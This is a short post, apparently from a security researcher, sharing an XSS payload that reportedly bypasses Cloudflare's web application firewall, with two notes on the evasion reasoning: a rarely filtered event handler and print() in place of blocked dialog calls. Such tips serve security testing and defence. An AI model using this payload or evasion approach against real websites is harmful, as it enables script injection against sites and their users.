Got an easy Cloudflare bypass with a simple XSS payload

“><img src=1 onmouseleave=print()>

Thought process:
1. WAF was checking event handler hence used onmouseleave (rarely used)
2. WAF blacklisted common dialog box hence used print()